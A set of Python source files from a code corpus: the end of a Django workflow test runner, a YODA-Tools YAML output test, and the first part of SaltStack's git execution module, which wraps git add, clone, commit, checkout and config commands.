failures = test_runner.run_tests(["lbworkflow"])
sys.exit(bool(failures))
if __name__ == "__main__":
os.environ["DJANGO_SETTINGS_MODULE"] = "lbworkflow.tests.settings"
django.setup()
from django.core.management import call_command
if (len(sys.argv)) == 2:
call_command(sys.argv[1])
sys.exit(0)
run_test()
|
{
"content_hash": "92e3014201ef8548889de78977e7ee65",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 70,
"avg_line_length": 22.875,
"alnum_prop": 0.663023679417122,
"repo_name": "vicalloy/django-lb-workflow",
"id": "ef9cdd55fadc733d540091323f2cfcf3c0457dd8",
"size": "571",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runtests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "39"
},
{
"name": "Dockerfile",
"bytes": "452"
},
{
"name": "HTML",
"bytes": "32992"
},
{
"name": "JavaScript",
"bytes": "18"
},
{
"name": "Makefile",
"bytes": "1081"
},
{
"name": "Python",
"bytes": "194839"
}
],
"symlink_target": ""
}
|
import os
from tests.test_util import build_ts_session, build_ts_specimen_session
from yodatools.converter.Outputs.yamlOutput import yamlOutput
curr_folder = os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
# curr_folder = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
# file_path = os.path.join(curr_folder, 'test_files', 'YODA_TimeSeriesSpecimen_RB_2014-15_pub.xlsx')
class TestYaml:
def setup(self):
self.yo = yamlOutput()
def test_create_ts(self):
session = build_ts_session()
file_path = os.path.join(curr_folder,'test_files', 'test_ts_output.yaml' )
self.yo.save(session, file_path)
def test_create_specimen(self):
session = build_ts_specimen_session()
file_path = file_path = os.path.join(curr_folder, 'test_files', 'test_ts_specimen_output.yaml' )
self.yo.save(session, file_path)
|
{
"content_hash": "c0bd0651b04034967a43ded2604b37bd",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 105,
"avg_line_length": 41.13636363636363,
"alnum_prop": 0.687292817679558,
"repo_name": "ODM2/YODA-Tools",
"id": "5920eada9d86f10158ac2aa9004a0d880d471732",
"size": "905",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_converter/test_output/test_yamlOutput.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "287065"
}
],
"symlink_target": ""
}
|
'''
Support for the Git SCM
'''
from __future__ import absolute_import
# Import python libs
import copy
import logging
import os
import re
from distutils.version import LooseVersion as _LooseVersion
# Import salt libs
import salt.utils
import salt.utils.files
import salt.utils.itertools
import salt.utils.url
from salt.exceptions import SaltInvocationError, CommandExecutionError
from salt.ext import six
log = logging.getLogger(__name__)
__func_alias__ = {
'rm_': 'rm'
}
def __virtual__():
'''
Only load if git exists on the system
'''
if salt.utils.which('git') is None:
return (False,
'The git execution module cannot be loaded: git unavailable.')
else:
return True
def _check_worktree_support(failhard=True):
'''
Ensure that we don't try to operate on worktrees in git < 2.5.0.
'''
git_version = version(versioninfo=False)
if _LooseVersion(git_version) < _LooseVersion('2.5.0'):
if failhard:
raise CommandExecutionError(
'Worktrees are only supported in git 2.5.0 and newer '
'(detected git version: ' + git_version + ')'
)
return False
return True
def _config_getter(get_opt,
key,
value_regex=None,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
Common code for config.get_* functions, builds and runs the git CLI command
and returns the result dict for the calling function to parse.
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
global_ = kwargs.pop('global', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if cwd is None:
if not global_:
raise SaltInvocationError(
'\'cwd\' argument required unless global=True'
)
else:
cwd = _expand_path(cwd, user)
if get_opt == '--get-regexp':
if value_regex is not None \
and not isinstance(value_regex, six.string_types):
value_regex = str(value_regex)
else:
# Ignore value_regex
value_regex = None
command = ['git', 'config']
command.extend(_which_git_config(global_, cwd, user))
command.append(get_opt)
command.append(key)
if value_regex is not None:
command.append(value_regex)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
failhard=False)
def _expand_path(cwd, user):
'''
Expand home directory
'''
try:
to_expand = '~' + user if user else '~'
except TypeError:
# Users should never be numeric but if we don't account for this then
# we're going to get a traceback if someone passes this invalid input.
to_expand = '~' + str(user) if user else '~'
try:
return os.path.join(os.path.expanduser(to_expand), cwd)
except AttributeError:
return os.path.join(os.path.expanduser(to_expand), str(cwd))
def _format_opts(opts):
'''
Common code to inspect opts and split them if necessary
'''
if opts is None:
return []
elif isinstance(opts, list):
new_opts = []
for item in opts:
if isinstance(item, six.string_types):
new_opts.append(item)
else:
new_opts.append(str(item))
return new_opts
else:
if not isinstance(opts, six.string_types):
opts = [str(opts)]
else:
opts = salt.utils.shlex_split(opts)
try:
if opts[-1] == '--':
# Strip the '--' if it was passed at the end of the opts string,
# it'll be added back (if necessary) in the calling function.
# Putting this check here keeps it from having to be repeated every
# time _format_opts() is invoked.
return opts[:-1]
except IndexError:
pass
return opts
def _git_run(command, cwd=None, runas=None, identity=None,
ignore_retcode=False, failhard=True, redirect_stderr=False,
saltenv='base', **kwargs):
'''
simple, throw an exception with the error message on an error return code.
this function may be moved to the command module, spliced with
'cmd.run_all', and used as an alternative to 'cmd.run_all'. Some
commands don't return proper retcodes, so this can't replace 'cmd.run_all'.
'''
env = {}
if identity:
_salt_cli = __opts__.get('__cli', '')
errors = []
missing_keys = []
# if the statefile provides multiple identities, they need to be tried
# (but also allow a string instead of a list)
if not isinstance(identity, list):
# force it into a list
identity = [identity]
# try each of the identities, independently
for id_file in identity:
if 'salt://' in id_file:
_id_file = id_file
id_file = __salt__['cp.cache_file'](id_file, saltenv)
if not id_file:
log.error('identity {0} does not exist.'.format(_id_file))
continue
else:
if not __salt__['file.file_exists'](id_file):
missing_keys.append(id_file)
log.error('identity {0} does not exist.'.format(id_file))
continue
env = {
'GIT_IDENTITY': id_file
}
# copy wrapper to area accessible by ``runas`` user
# currently no suppport in windows for wrapping git ssh
ssh_id_wrapper = os.path.join(
salt.utils.templates.TEMPLATE_DIRNAME,
'git/ssh-id-wrapper'
)
if salt.utils.is_windows():
for suffix in ('', ' (x86)'):
ssh_exe = (
'C:\\Program Files{0}\\Git\\bin\\ssh.exe'
.format(suffix)
)
if os.path.isfile(ssh_exe):
env['GIT_SSH_EXE'] = ssh_exe
break
else:
raise CommandExecutionError(
'Failed to find ssh.exe, unable to use identity file'
)
# Use the windows batch file instead of the bourne shell script
ssh_id_wrapper += '.bat'
env['GIT_SSH'] = ssh_id_wrapper
else:
tmp_file = salt.utils.mkstemp()
salt.utils.files.copyfile(ssh_id_wrapper, tmp_file)
os.chmod(tmp_file, 0o500)
os.chown(tmp_file, __salt__['file.user_to_uid'](runas), -1)
env['GIT_SSH'] = tmp_file
if 'salt-call' not in _salt_cli \
and __salt__['ssh.key_is_encrypted'](id_file):
errors.append(
'Identity file {0} is passphrase-protected and cannot be '
'used in a non-interactive command. Using salt-call from '
'the minion will allow a passphrase-protected key to be '
'used.'.format(id_file)
)
continue
log.info(
'Attempting git authentication using identity file {0}'
.format(id_file)
)
try:
result = __salt__['cmd.run_all'](
command,
cwd=cwd,
runas=runas,
env=env,
python_shell=False,
log_callback=salt.utils.url.redact_http_basic_auth,
ignore_retcode=ignore_retcode,
redirect_stderr=redirect_stderr,
**kwargs)
finally:
if not salt.utils.is_windows() and 'GIT_SSH' in env:
os.remove(env['GIT_SSH'])
# If the command was successful, no need to try additional IDs
if result['retcode'] == 0:
return result
else:
err = result['stdout' if redirect_stderr else 'stderr']
if err:
errors.append(salt.utils.url.redact_http_basic_auth(err))
# We've tried all IDs and still haven't passed, so error out
if failhard:
msg = (
'Unable to authenticate using identity file:\n\n{0}'.format(
'\n'.join(errors)
)
)
if missing_keys:
if errors:
msg += '\n\n'
msg += (
'The following identity file(s) were not found: {0}'
.format(', '.join(missing_keys))
)
raise CommandExecutionError(msg)
return result
else:
result = __salt__['cmd.run_all'](
command,
cwd=cwd,
runas=runas,
env=env,
python_shell=False,
log_callback=salt.utils.url.redact_http_basic_auth,
ignore_retcode=ignore_retcode,
redirect_stderr=redirect_stderr,
**kwargs)
if result['retcode'] == 0:
return result
else:
if failhard:
gitcommand = ' '.join(command) \
if isinstance(command, list) \
else command
msg = 'Command \'{0}\' failed'.format(
salt.utils.url.redact_http_basic_auth(gitcommand)
)
err = result['stdout' if redirect_stderr else 'stderr']
if err:
msg += ': {0}'.format(
salt.utils.url.redact_http_basic_auth(err)
)
raise CommandExecutionError(msg)
return result
def _get_toplevel(path, user=None):
'''
Use git rev-parse to return the top level of a repo
'''
return _git_run(
['git', 'rev-parse', '--show-toplevel'],
cwd=path,
runas=user
)['stdout']
def _git_config(cwd, user):
'''
Helper to retrieve git config options
'''
contextkey = 'git.config.' + cwd
if contextkey not in __context__:
git_dir = rev_parse(cwd,
opts=['--git-dir'],
user=user,
ignore_retcode=True)
if not os.path.isabs(git_dir):
paths = (cwd, git_dir, 'config')
else:
paths = (git_dir, 'config')
__context__[contextkey] = os.path.join(*paths)
return __context__[contextkey]
def _which_git_config(global_, cwd, user):
'''
Based on whether global or local config is desired, return a list of CLI
args to include in the git config command.
'''
if global_:
return ['--global']
version_ = _LooseVersion(version(versioninfo=False))
if version_ >= _LooseVersion('1.7.10.2'):
# --local added in 1.7.10.2
return ['--local']
else:
# For earlier versions, need to specify the path to the git config file
return ['--file', _git_config(cwd, user)]
def add(cwd, filename, opts='', user=None, ignore_retcode=False):
'''
.. versionchanged:: 2015.8.0
The ``--verbose`` command line argument is now implied
Interface to `git-add(1)`_
cwd
The path to the git checkout
filename
The location of the file/directory to add, relative to ``cwd``
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-add(1)`: http://git-scm.com/docs/git-add
CLI Examples:
.. code-block:: bash
salt myminion git.add /path/to/repo foo/bar.py
salt myminion git.add /path/to/repo foo/bar.py opts='--dry-run'
'''
cwd = _expand_path(cwd, user)
if not isinstance(filename, six.string_types):
filename = str(filename)
command = ['git', 'add', '--verbose']
command.extend(
[x for x in _format_opts(opts) if x not in ('-v', '--verbose')]
)
command.extend(['--', filename])
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def archive(cwd,
output,
rev='HEAD',
fmt=None,
prefix=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionchanged:: 2015.8.0
Returns ``True`` if successful, raises an error if not.
Interface to `git-archive(1)`_, exports a tarball/zip file of the
repository
cwd
The path to be archived
.. note::
``git archive`` permits a partial archive to be created. Thus, this
path does not need to be the root of the git repository. Only the
files within the directory specified by ``cwd`` (and its
subdirectories) will be in the resulting archive. For example, if
there is a git checkout at ``/tmp/foo``, then passing
``/tmp/foo/bar`` as the ``cwd`` will result in just the files
underneath ``/tmp/foo/bar`` to be exported as an archive.
output
The path of the archive to be created
overwrite : False
Unless set to ``True``, Salt will over overwrite an existing archive at
the path specified by the ``output`` argument.
.. versionadded:: 2015.8.0
rev : HEAD
The revision from which to create the archive
format
Manually specify the file format of the resulting archive. This
argument can be omitted, and ``git archive`` will attempt to guess the
archive type (and compression) from the filename. ``zip``, ``tar``,
``tar.gz``, and ``tgz`` are extensions that are recognized
automatically, and git can be configured to support other archive types
with the addition of git configuration keys.
See the `git-archive(1)`_ manpage explanation of the
``--format`` argument (as well as the ``CONFIGURATION`` section of the
manpage) for further information.
.. versionadded:: 2015.8.0
fmt
Replaced by ``format`` in version 2015.8.0
.. deprecated:: 2015.8.0
prefix
Prepend ``<prefix>`` to every filename in the archive. If unspecified,
the name of the directory at the top level of the repository will be
used as the prefix (e.g. if ``cwd`` is set to ``/foo/bar/baz``, the
prefix will be ``baz``, and the resulting archive will contain a
top-level directory by that name).
.. note::
The default behavior if the ``--prefix`` option for ``git archive``
is not specified is to not prepend a prefix, so Salt's behavior
differs slightly from ``git archive`` in this respect. Use
``prefix=''`` to create an archive with no prefix.
.. versionchanged:: 2015.8.0
The behavior of this argument has been changed slightly. As of
this version, it is necessary to include the trailing slash when
specifying a prefix, if the prefix is intended to create a
top-level directory.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-archive(1)`: http://git-scm.com/docs/git-archive
CLI Example:
.. code-block:: bash
salt myminion git.archive /path/to/repo /path/to/archive.tar
'''
cwd = _expand_path(cwd, user)
output = _expand_path(output, user)
# Sanitize kwargs and make sure that no invalid ones were passed. This
# allows us to accept 'format' as an argument to this function without
# shadowing the format() global, while also not allowing unwanted arguments
# to be passed.
kwargs = salt.utils.clean_kwargs(**kwargs)
format_ = kwargs.pop('format', None)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if fmt:
salt.utils.warn_until(
'Nitrogen',
'The \'fmt\' argument to git.archive has been deprecated, please '
'use \'format\' instead.'
)
format_ = fmt
command = ['git', 'archive']
# If prefix was set to '' then we skip adding the --prefix option
if prefix != '':
if prefix:
if not isinstance(prefix, six.string_types):
prefix = str(prefix)
else:
prefix = os.path.basename(cwd) + '/'
command.extend(['--prefix', prefix])
if format_:
if not isinstance(format_, six.string_types):
format_ = str(format_)
command.extend(['--format', format_])
command.extend(['--output', output, rev])
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
# No output (unless --verbose is used, and we don't want all files listed
# in the output in case there are thousands), so just return True
return True
def branch(cwd, name=None, opts='', user=None, ignore_retcode=False):
'''
Interface to `git-branch(1)`_
cwd
The path to the git checkout
name
Name of the branch on which to operate. If not specified, the current
branch will be assumed.
opts
Any additional options to add to the command line, in a single string
.. note::
To create a branch based on something other than HEAD, pass the
name of the revision as ``opts``. If the revision is in the format
``remotename/branch``, then this will also set the remote tracking
branch.
Additionally, on the Salt CLI, if the opts are preceded with a
dash, it is necessary to precede them with ``opts=`` (as in the CLI
examples below) to avoid causing errors with Salt's own argument
parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-branch(1)`: http://git-scm.com/docs/git-branch
CLI Examples:
.. code-block:: bash
# Set remote tracking branch
salt myminion git.branch /path/to/repo mybranch opts='--set-upstream-to origin/mybranch'
# Create new branch
salt myminion git.branch /path/to/repo mybranch upstream/somebranch
# Delete branch
salt myminion git.branch /path/to/repo mybranch opts='-d'
# Rename branch (2015.8.0 and later)
salt myminion git.branch /path/to/repo newbranch opts='-m oldbranch'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'branch']
command.extend(_format_opts(opts))
if name is not None:
command.append(name)
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
return True
def checkout(cwd,
rev=None,
force=False,
opts='',
user=None,
ignore_retcode=False):
'''
Interface to `git-checkout(1)`_
cwd
The path to the git checkout
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
rev
The remote branch or revision to checkout.
.. versionchanged:: 2015.8.0
Optional when using ``-b`` or ``-B`` in ``opts``.
force : False
Force a checkout even if there might be overwritten changes
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-checkout(1)`: http://git-scm.com/docs/git-checkout
CLI Examples:
.. code-block:: bash
# Checking out local local revisions
salt myminion git.checkout /path/to/repo somebranch user=jeff
salt myminion git.checkout /path/to/repo opts='testbranch -- conf/file1 file2'
salt myminion git.checkout /path/to/repo rev=origin/mybranch opts='--track'
# Checking out remote revision into new branch
salt myminion git.checkout /path/to/repo upstream/master opts='-b newbranch'
# Checking out current revision into new branch (2015.8.0 and later)
salt myminion git.checkout /path/to/repo opts='-b newbranch'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'checkout']
if force:
command.append('--force')
opts = _format_opts(opts)
command.extend(opts)
checkout_branch = any(x in opts for x in ('-b', '-B'))
if rev is None:
if not checkout_branch:
raise SaltInvocationError(
'\'rev\' argument is required unless -b or -B in opts'
)
else:
if not isinstance(rev, six.string_types):
rev = str(rev)
command.append(rev)
# Checkout message goes to stderr
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
redirect_stderr=True)['stdout']
def clone(cwd,
url=None, # Remove default value once 'repository' arg is removed
name=None,
opts='',
user=None,
identity=None,
https_user=None,
https_pass=None,
ignore_retcode=False,
repository=None,
saltenv='base'):
'''
Interface to `git-clone(1)`_
cwd
Location of git clone
.. versionchanged:: 2015.8.0
If ``name`` is passed, then the clone will be made *within* this
directory.
url
The URL of the repository to be cloned
.. versionchanged:: 2015.8.0
Argument renamed from ``repository`` to ``url``
name
Optional alternate name for the top-level directory to be created by
the clone
.. versionadded:: 2015.8.0
opts
Any additional options to add to the command line, in a single string
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
Run git as a user other than what the minion runs as
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
Key can also be specified as a SaltStack file server URL, eg. salt://location/identity_file
.. versionchanged:: 2016.3.0
https_user
Set HTTP Basic Auth username. Only accepted for HTTPS URLs.
.. versionadded:: 20515.5.0
https_pass
Set HTTP Basic Auth password. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-clone(1)`: http://git-scm.com/docs/git-clone
CLI Example:
.. code-block:: bash
salt myminion git.clone /path/to/repo_parent_dir git://github.com/saltstack/salt.git
'''
cwd = _expand_path(cwd, user)
if repository is not None:
salt.utils.warn_until(
'Nitrogen',
'The \'repository\' argument to git.clone has been '
'deprecated, please use \'url\' instead.'
)
url = repository
if not url:
raise SaltInvocationError('Missing \'url\' argument')
try:
url = salt.utils.url.add_http_basic_auth(url,
https_user,
https_pass,
https_only=True)
except ValueError as exc:
raise SaltInvocationError(exc.__str__())
command = ['git', 'clone']
command.extend(_format_opts(opts))
command.extend(['--', url])
if name is not None:
if not isinstance(name, six.string_types):
name = str(name)
command.append(name)
if not os.path.exists(cwd):
os.makedirs(cwd)
clone_cwd = cwd
else:
command.append(cwd)
# Use '/tmp' instead of $HOME (/root for root user) to work around
# upstream git bug. See the following comment on the Salt bug tracker
# for more info:
# https://github.com/saltstack/salt/issues/15519#issuecomment-128531310
# On Windows, just fall back to None (runs git clone command using the
# home directory as the cwd).
clone_cwd = '/tmp' if not salt.utils.is_windows() else None
_git_run(command,
cwd=clone_cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)
return True
def commit(cwd,
message,
opts='',
user=None,
filename=None,
ignore_retcode=False):
'''
Interface to `git-commit(1)`_
cwd
The path to the git checkout
message
Commit message
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
The ``-m`` option should not be passed here, as the commit message
will be defined by the ``message`` argument.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
filename
The location of the file/directory to commit, relative to ``cwd``.
This argument is optional, and can be used to commit a file without
first staging it.
.. note::
This argument only works on files which are already tracked by the
git repository.
.. versionadded:: 2015.8.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-commit(1)`: http://git-scm.com/docs/git-commit
CLI Examples:
.. code-block:: bash
salt myminion git.commit /path/to/repo 'The commit message'
salt myminion git.commit /path/to/repo 'The commit message' filename=foo/bar.py
'''
cwd = _expand_path(cwd, user)
command = ['git', 'commit', '-m', message]
command.extend(_format_opts(opts))
if filename:
if not isinstance(filename, six.string_types):
filename = str(filename)
# Add the '--' to terminate CLI args, but only if it wasn't already
# passed in opts string.
command.extend(['--', filename])
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def config_get(key,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
Get the value of a key in the git configuration file
key
The name of the configuration key to get
.. versionchanged:: 2015.8.0
Argument renamed from ``setting_name`` to ``key``
cwd
The path to the git checkout
.. versionchanged:: 2015.8.0
Now optional if ``global`` is set to ``True``
global : False
If ``True``, query the global git configuraton. Otherwise, only the
local git configuration will be queried.
.. versionadded:: 2015.8.0
all : False
If ``True``, return a list of all values set for ``key``. If the key
does not exist, ``None`` will be returned.
.. versionadded:: 2015.8.0
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.config_get user.name cwd=/path/to/repo
salt myminion git.config_get user.email global=True
salt myminion git.config_get core.gitproxy cwd=/path/to/repo all=True
'''
# Sanitize kwargs and make sure that no invalid ones were passed. This
# allows us to accept 'all' as an argument to this function without
# shadowing all(), while also not allowing unwanted arguments to be passed.
all_ = kwargs.pop('all', False)
result = _config_getter('--get-all',
key,
cwd=cwd,
user=user,
ignore_retcode=ignore_retcode,
**kwargs)
# git config --get exits with retcode of 1 when key does not exist
if result['retcode'] == 1:
return None
ret = result['stdout'].splitlines()
if all_:
return ret
else:
try:
return ret[-1]
except IndexError:
# Should never happen but I'm paranoid and don't like tracebacks
return ''
def config_get_regexp(key,
value_regex=None,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
r'''
.. versionadded:: 2015.8.0
Get the value of a key or keys in the git configuration file using regexes
for more flexible matching. The return data is a dictionary mapping keys to
lists of values matching the ``value_regex``. If no values match, an empty
dictionary will be returned.
key
Regex on which key names will be matched
value_regex
If specified, return all values matching this regex. The return data
will be a dictionary mapping keys to lists of values matching the
regex.
.. important::
Only values matching the ``value_regex`` will be part of the return
data. So, if ``key`` matches a multivar, then it is possible that
not all of the values will be returned. To get all values set for a
multivar, simply omit the ``value_regex`` argument.
cwd
The path to the git checkout
global : False
If ``True``, query the global git configuraton. Otherwise, only the
local git configuration will be queried.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
CLI Examples:
.. code-block:: bash
# Matches any values for key 'foo.bar'
salt myminion git.config_get_regexp /path/to/repo foo.bar
# Matches any value starting with 'baz' set for key 'foo.bar'
salt myminion git.config_get_regexp /path/to/repo foo.bar 'baz.*'
# Matches any key starting with 'user.'
salt myminion git.config_get_regexp '^user\.' global=True
'''
result = _config_getter('--get-regexp',
key,
value_regex=value_regex,
cwd=cwd,
user=user,
ignore_retcode=ignore_retcode,
**kwargs)
# git config --get exits with retcode of 1 when key does not exist
ret = {}
if result['retcode'] == 1:
return ret
for line in result['stdout'].splitlines():
try:
param, value = line.split(None, 1)
except ValueError:
continue
ret.setdefault(param, []).append(value)
return ret
config_get_regex = salt.utils.alias_function(config_get_regexp, 'config_get_regex')
def config_set(key,
value=None,
multivar=None,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionchanged:: 2015.8.0
Return the value(s) of the key being set
Set a key in the git configuration file
cwd
The path to the git checkout. Must be an absolute path, or the word
``global`` to indicate that a global key should be set.
.. versionchanged:: 2014.7.0
Made ``cwd`` argument optional if ``is_global=True``
key
The name of the configuration key to set
.. versionchanged:: 2015.8.0
Argument renamed from ``setting_name`` to ``key``
value
The value to set for the specified key. Incompatible with the
``multivar`` argument.
.. versionchanged:: 2015.8.0
Argument renamed from ``setting_value`` to ``value``
add : False
Add a value to a key, creating/updating a multivar
.. versionadded:: 2015.8.0
multivar
Set a multivar all at once. Values can be comma-separated or passed as
a Python list. Incompatible with the ``value`` argument.
.. versionadded:: 2015.8.0
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
global : False
If ``True``, set a global variable
is_global : False
If ``True``, set a global variable
.. deprecated:: 2015.8.0
Use ``global`` instead
CLI Example:
.. code-block:: bash
salt myminion git.config_set user.email me@example.com cwd=/path/to/repo
salt myminion git.config_set user.email foo@bar.com global=True
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
add_ = kwargs.pop('add', False)
global_ = kwargs.pop('global', False)
is_global = kwargs.pop('is_global', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if is_global:
salt.utils.warn_until(
'Nitrogen',
'The \'is_global\' argument to git.config_set has been '
'deprecated, please set the \'cwd\' argument to \'global\' '
'instead.'
)
global_ = True
if cwd is None:
if not global_:
raise SaltInvocationError(
'\'cwd\' argument required unless global=True'
)
else:
cwd = _expand_path(cwd, user)
if all(x is not None for x in (value, multivar)):
raise SaltInvocationError(
'Only one of \'value\' and \'multivar\' is permitted'
)
if value is not None:
if not isinstance(value, six.string_types):
value = str(value)
if multivar is not None:
if not isinstance(multivar, list):
try:
multivar = multivar.split(',')
except AttributeError:
multivar = str(multivar).split(',')
else:
new_multivar = []
for item in multivar:
if isinstance(item, six.string_types):
new_multivar.append(item)
else:
new_multivar.append(str(item))
multivar = new_multivar
command_prefix = ['git', 'config']
if global_:
command_prefix.append('--global')
if value is not None:
command = copy.copy(command_prefix)
if add_:
command.append('--add')
else:
command.append('--replace-all')
command.extend([key, value])
_git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)
else:
for idx, target in enumerate(multivar):
command = copy.copy(command_prefix)
if idx == 0:
command.append('--replace-all')
else:
command.append('--add')
command.extend([key, target])
_git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)
return config_get(key,
user=user,
cwd=cwd,
ignore_retcode=ignore_retcode,
**{'all': True, 'global': global_})
def config_unset(key,
value_regex=None,
cwd=None,
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionadded:: 2015.8.0
Unset a key in the git configuration file
cwd
The path to the git checkout. Must be an absolute path, or the word
``global`` to indicate that a global key should be unset.
key
The name of the configuration key to unset
value_regex
Regular expression that matches exactly one key, used to delete a
single value from a multivar. Ignored if ``all`` is set to ``True``.
all : False
If ``True`` unset all values for a multivar. If ``False``, and ``key``
is a multivar, an error will be raised.
global : False
If ``True``, unset set a global variable. Otherwise, a local variable
will be unset.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
CLI Example:
.. code-block:: bash
salt myminion git.config_unset /path/to/repo foo.bar
salt myminion git.config_unset /path/to/repo foo.bar all=True
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
all_ = kwargs.pop('all', False)
global_ = kwargs.pop('global', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if cwd is None:
if not global_:
raise SaltInvocationError(
'\'cwd\' argument required unless global=True'
)
else:
cwd = _expand_path(cwd, user)
command = ['git', 'config']
if all_:
command.append('--unset-all')
else:
command.append('--unset')
command.extend(_which_git_config(global_, cwd, user))
if not isinstance(key, six.string_types):
key = str(key)
command.append(key)
if value_regex is not None:
if not isinstance(value_regex, six.string_types):
value_regex = str(value_regex)
command.append(value_regex)
ret = _git_run(command,
cwd=cwd if cwd != 'global' else None,
runas=user,
ignore_retcode=ignore_retcode,
failhard=False)
retcode = ret['retcode']
if retcode == 0:
return True
elif retcode == 1:
raise CommandExecutionError('Section or key is invalid')
elif retcode == 5:
if config_get(cwd,
key,
user=user,
ignore_retcode=ignore_retcode) is None:
raise CommandExecutionError(
'Key \'{0}\' does not exist'.format(key)
)
else:
msg = 'Multiple values exist for key \'{0}\''.format(key)
if value_regex is not None:
msg += ' and value_regex matches multiple values'
raise CommandExecutionError(msg)
elif retcode == 6:
raise CommandExecutionError('The value_regex is invalid')
else:
msg = (
'Failed to unset key \'{0}\', git config returned exit code {1}'
.format(key, retcode)
)
if ret['stderr']:
msg += '; ' + ret['stderr']
raise CommandExecutionError(msg)
def current_branch(cwd, user=None, ignore_retcode=False):
'''
Returns the current branch name of a local checkout. If HEAD is detached,
return the SHA1 of the revision which is currently checked out.
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Example:
.. code-block:: bash
salt myminion git.current_branch /path/to/repo
'''
cwd = _expand_path(cwd, user)
command = ['git', 'rev-parse', '--abbrev-ref', 'HEAD']
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def describe(cwd, rev='HEAD', user=None, ignore_retcode=False):
'''
Returns the `git-describe(1)`_ string (or the SHA1 hash if there are no
tags) for the given revision.
